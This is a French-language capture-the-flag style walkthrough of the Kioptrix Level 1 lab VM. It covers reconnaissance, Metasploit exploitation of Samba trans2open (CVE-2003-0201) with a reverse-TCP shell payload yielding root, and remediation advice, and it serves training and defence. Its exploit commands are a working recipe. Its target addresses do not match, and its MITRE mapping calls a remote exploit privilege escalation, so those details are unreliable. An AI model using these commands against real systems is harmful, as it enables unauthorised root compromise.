Kioptrix Level 1 : Audit de vulnérabilité et exploitation à spectre complet
🏛️ Objectif professionnel
L'objectif était d'effectuer un test d'intrusion structuré sur l'environnement Kioptrix Level 1 afin d'obtenir un compromis complet 'root' et de documenter des stratégies de correction technique adaptées aux opérations des équipes Red et Blue.
🏗️ Reproduction de l'environnement (Contexte matériel)
Les paramètres par défaut de la virtualisation moderne échouent souvent sur les noyaux anciens de 2010. Pour démarrer et mettre en réseau cette machine avec succès, les configurations architecturales spécifiques suivantes étaient nécessaires :
- Sous-type OS : Linux / Red Hat (32 bits).
- Architecture de stockage : Passage de SATA à Contrôleur IDE pour prendre en charge le disque dur .vmdk hérité.
- Protocole réseau : Configuré en PCI FAST-III avec un adaptateur hôte uniquement pour permettre la communication interne avec la machine d'attaque Kali Linux.
⚔️ Analyse offensive (Voie Red Team)
L'exploitation a suivi un cycle de vie manuel allant de l'énumération à l'exploitation :
1. Découverte et reconnaissance
- Netdiscover : Utilisation de
netdiscover -r 192.168.184.4 pour identifier l'IP cible.
- Scan Nmap : Identification des services incluant SSH (22), HTTP (80), RPC (111) et NetBIOS-SSN (139). Samba 2.2.1a a été signalé comme le point d'entrée principal.
2. Exploitation (trans2open de Samba)
- Vulnérabilité : CVE-2003-0201 (Débordement de tas).
- Cartographie MITRE ATT&CK : - Tactique : Élévation de privilèges (TA0004)
- Technique : Exploitation pour l'élévation de privilèges (T1068)
- Protocole Metasploit :
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- Résultat : Obtention réussie d'un shell inversé. La commande
whoami a renvoyé root.
🛡️ Correction défensive (Voie Blue Team)
Pour sécuriser un environnement d'entreprise, les stratégies de Gestion des vulnérabilités (VM) suivantes sont obligatoires :
- Protocole de correction : Mettre à jour Samba vers la dernière version prise en charge (Samba 4.x). La vulnérabilité dans la fonction
call_trans2open est corrigée dans toutes les versions modernes.
- Renforcement réseau : Déployer des pare-feu basés sur l'hôte pour limiter les Ports 139 et 445 aux sous-réseaux internes de confiance uniquement.
- Stratégie de rôle VM : Cette correction relève des cycles standard de Gestion des vulnérabilités pendant les heures ouvrables, garantissant la stabilité de l'infrastructure.
📝 Preuves techniques et journaux manuels
Les images suivantes documentent l'énumération manuelle en direct et l'exécution en terminal :
Découverte de la cible et notes d'architecture


Preuve d'accès root (capture d'écran du terminal)
Preuve du shell root